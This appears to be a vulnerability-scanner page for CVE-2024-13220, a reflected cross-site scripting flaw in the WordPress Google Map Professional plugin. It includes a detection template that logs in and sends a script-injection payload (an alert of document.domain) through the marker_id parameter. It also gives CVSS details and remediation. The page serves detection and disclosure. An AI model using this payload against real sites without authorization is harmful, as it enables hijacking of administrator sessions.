WordPress Google Map Professional - Cross-Site Scripting
CVE-2024-13220
Verified
Description
WordPress Google Map Professional (Map In Your Language) plugin through 1.0 contains a reflected cross-site scripting caused by lack of sanitization and escaping of a parameter before outputting it in the page, letting attackers execute malicious scripts in the context of high privilege users such as admin, exploit requires victim to load a maliciously crafted URL.
Severity
Medium
CVSS Score
6.1
Exploit Probability
1%
Affected Product
google_map_professional
Published Date
February 6, 2026
Template Author
sourabh-sahu
CVE-2024-13220.yaml
id: CVE-2024-13220
info:
name: WordPress Google Map Professional - Cross-Site Scripting
author: Sourabh-Sahu
severity: medium
description: |
WordPress Google Map Professional (Map In Your Language) plugin through 1.0 contains a reflected cross-site scripting caused by lack of sanitization and escaping of a parameter before outputting it in the page, letting attackers execute malicious scripts in the context of high privilege users such as admin, exploit requires victim to load a maliciously crafted URL.
impact: |
Attackers can execute arbitrary scripts in the context of high privilege users, potentially leading to account compromise or session hijacking.
remediation: |
Update to the latest version of the plugin where the issue is fixed or implement proper sanitization and escaping measures.
reference:
- https://wpscan.com/vulnerability/33ef27b4-e88f-46ec-9b3f-0a3e16d6f82e/
- https://nvd.nist.gov/vuln/detail/CVE-2024-13220
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2024-13220
cwe-id: CWE-79
epss-score: 0.00565
epss-percentile: 0.42795
cpe: cpe:2.3:a:pragmasoftwares:google_map_professional:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: pragmasoftwares
product: google_map_professional
tags: cve,cve2024,google-map-professional,wordpress,wp,xss,wp-plugin,authenticated
flow: http(1) && http(2)
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to=
matchers:
- type: dsl
dsl:
- contains(header, "wordpress_logged_in")
internal: true
- raw:
- |
GET /wp-admin/admin.php?page=googlemarker-admin&marker_id=1"></script><script>alert(document.domain)</script><script> HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- contains_all(body, "></script><script>alert(document.domain)</script><script>", "Edit Map")
- contains(content_type, "text/html")
- status_code == 200
condition: and
# digest: 4b0a00483046022100abbdde349a10cc883f0d6377d496b277f54c88a3162dbb00a82fcd956bbeea61022100fb47b363071e785beefc7c3c26c6edd078557229fdddddc4e0584f05673b7827:922c64590222798bb761d5b6d8e729506.1Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CVE ID:
cve-2024-13220
CWE ID:
cwe-79
Remediation Steps
Update to the latest version of the plugin where the issue is fixed or implement proper sanitization and escaping measures.